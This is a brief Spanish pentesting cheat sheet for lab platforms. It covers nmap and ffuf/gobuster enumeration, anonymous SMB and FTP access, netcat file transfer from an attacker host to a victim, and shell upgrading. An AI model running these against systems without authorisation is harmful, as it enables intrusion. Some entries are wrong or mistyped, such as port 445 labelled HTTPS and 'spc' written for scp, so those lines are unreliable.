Pentesting 📕


Las herramientas presentes en este apartado son invasivas; no podemos utilizar estas técnicas sin el consentimiento o la aprobación por parte del objetivo.
Podemos emplearlas a nivel didáctico en plataformas como HacktheBox o TryHackme..

Pequeña guía sobre las herramientas básicas necesarias para el pentesting.

Puertos destacables 🔑

  • 21 (FTP) Posible acceso con login anónimo.

  • 22 (SSH) Si obtenemos las credenciales podemos tener acceso al sistema a través de este servicio.

  • 80 (HTTP) Servidor web - Enumeración de directorios y búsqueda de vulnerabilidades en el servidor web.

  • 143 / 993 (IMAP) Ataques de fuerza bruta contra las credenciales del servidor de correo electrónico.

  • 110 / 995 (SSL) Posibles ataques de fuerza bruta contra las credenciales del servidor POP3.

  • 445 (HTTPS): Enumeración de certificados SSL/TLS para revelar posibles debilidades en la configuración de seguridad del servidor.

Escaneo de Red 💻


Nmap

https://nmap.org/

Es una herramienta de escaneo de puertos y análisis de redes de código abierto que se utiliza para identificar hosts y servicios en una red

Escaneo de Hosts:

nmap -n -sn --reason --min-rate 2000 10.0.0.0/24 -oN hostDiscovery

Escaneo de Puertos:

nmap -np- -Pn --min-rate 5000 -v 10.0.0.0 -oN tcpPort

Escaneo en dDtalle de un puerto:

nmap -n -p21 -Pn -T5 10.0.0.0 -oN tcpPort21 -sVC

Herramientas para Servicios web 🕸️


FFuF

https://github.com/ffuf/ffuf Herramienta de fuzzing de código abierto.

Enumeración de URL:

ffuf -u http://localhost:3000/FUZZ -fc 404,403 -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt

Enumeración de Archivos

ffuf -u http://localhost:3000/FUZZ -fc 404,403 -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.html,.txt

Enumeración de Subdominios

ffuf -u http://FUZZ.localhost:3000/ -fc 404,403 -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt


Gobuster

https://github.com/OJ/gobuster

Herramienta de enumeración de directorios y subdominios.

Enumeración de URL:

gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://domain.com -x php,txt,html,cgi

Enumeración de Subdominios:

gobuster dns -d http://domain.com -w wordlist.txt -i

Enumeración de Pantallas Ocultas:

gobuster vhost -u http://domain.com -w wordlist.txt -v

Servicio SMB 🔑


Protocolo responsable de transferir datos entre un cliente y un servidor en redes de área local.

Enumeracion de recursos compartidos:

smbclient -L 10.10.10.10 -N

rpcclient -U "" -N 10.10.10.10

Entrar con login anonimo:

smbclient //10.10.212.43/Anonymous/

FTP 💻


Entrar con usuario anónimo

ftp 10.0.0.0 21

`#Name:anonymous #Pass: -

Transferencia de archivos 🗃️


PYTHON

python3 -m http.server 8000

python2 -m SimpleHTTPServer 8000

curl http://10.10.10.10/file.php

Netcat

Maquina hacker

nc -lvnp 4444 < file

Maquina Victima

nc 10.10.10.10 4444 > file

SSH

Archivo

spc file.txt user@10.10.10.10:/path/

Carpeta

spc -r user@10.10.10.10:/folder /path/folder/

Shell Upgrading 🐚


script /dev/null -c bash

cntrl+Z

stty raw -echo; fg

reset xterm

export SHELL=bash

export TERM=xterm

stty raws <filas> cols <columnas>